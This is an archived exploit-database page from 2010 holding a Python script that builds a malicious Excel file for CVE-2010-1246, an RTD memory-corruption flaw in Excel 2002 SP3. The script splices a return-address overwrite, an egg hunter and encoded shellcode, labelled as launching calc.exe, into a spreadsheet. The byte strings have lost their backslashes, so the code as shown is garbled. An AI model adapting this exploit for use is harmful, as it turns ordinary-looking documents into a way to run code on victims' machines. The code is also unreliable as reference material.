[local expoits] - Excel RTD Memory Corruption
Posted on 09 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Excel RTD Memory Corruption | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local expoits | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================== Excel RTD Memory Corruption =========================== Title : Excel RTD Memory Corruption Version : Excel 2002 sp3 Analysis : http://www.abysssec.com Vendor : http://www.microsoft.com Impact : Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1246 MOAUB Number : MOAUB_10_BA ''' import sys def main(): try: fdR = open('src.xls', 'rb+') strTotal = fdR.read() str1 = strTotal[:4509] str2 = strTotal[5013:15000] str3 = strTotal[15800:] eip = "xAdx57x00x30" # pop pop ret jmp = "xF7xC2x03x30" # call esp #Egg Hunter eggHunter = "" eggHunter += "x90x90x90" eggHunter += "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex8AxD8x80xFBx05x5Ax74xECxB8x63" eggHunter += "x70x74x6ex8BxFAxAFx75xE7xAFx75xE4xFFxE7" # shellcode calc.exe shellcode = 'x63x70x74x6ex63x70x74x6ex90x90x90x89xE5xD9xEExD9x75xF4x5Ex56x59x49x49x49x49x49x49x49x49x49x49x43x43x43x43x43x43x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41x42x75x4Ax49x4Bx4Cx4Bx58x51x54x43x30x43x30x45x50x4Cx4Bx51x55x47x4Cx4Cx4Bx43x4Cx43x35x44x38x45x51x4Ax4Fx4Cx4Bx50x4Fx44x58x4Cx4Bx51x4Fx47x50x45x51x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43x31x4Ax4Ex46x51x49x50x4Ax39x4Ex4Cx4Cx44x49x50x42x54x45x57x49x51x48x4Ax44x4Dx45x51x49x52x4Ax4Bx4Bx44x47x4Bx46x34x46x44x45x54x43x45x4Ax45x4Cx4Bx51x4Fx47x54x43x31x4Ax4Bx43x56x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4Bx43x31x4Ax4Bx4Cx49x51x4Cx47x54x45x54x48x43x51x4Fx46x51x4Cx36x43x50x46x36x45x34x4Cx4Bx50x46x50x30x4Cx4Bx47x30x44x4Cx4Cx4Bx44x30x45x4Cx4Ex4Dx4Cx4Bx42x48x44x48x4Dx59x4Bx48x4Bx33x49x50x43x5Ax46x30x45x38x4Cx30x4Cx4Ax45x54x51x4Fx42x48x4Dx48x4Bx4Ex4Dx5Ax44x4Ex50x57x4Bx4Fx4Ax47x43x53x47x4Ax51x4Cx50x57x51x59x50x4Ex50x44x50x4Fx46x37x50x53x51x4Cx43x43x42x59x44x33x43x44x43x55x42x4Dx50x33x50x32x51x4Cx42x43x45x31x42x4Cx42x43x46x4Ex45x35x44x38x42x45x43x30x41x41' if len(eggHunter) > 266: print "[*] Error : Shellcode length is long" return if len(eggHunter) <=266: dif =266 - len(eggHunter) while dif > 0 : eggHunter += 'x90' dif = dif - 1 if len(shellcode) > 800: print "[*] Error : Shellcode length is long" return if len(shellcode) <= 800: dif = 800 - len(shellcode) while dif > 0 : shellcode += 'x90' dif = dif - 1 fdW= open('exploit.xls', 'wb+') fdW.write(str1) fdW.write("x41x41x41") # padding fdW.write(jmp) fdW.write(eggHunter) fdW.write("xebx06x41x41") fdW.write(eip) fdW.write("x81xc4x24x16x00x00") # add esp,2016 fdW.write("xc3") #ret i = 0 while i < 54 : fdW.write("x41x41x41x41") # padding i = i + 1 fdW.write(str2) fdW.write(shellcode) fdW.write(str3) fdW.close() fdR.close() print '[-] Excel file generated' except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-09]</pre></body></html>
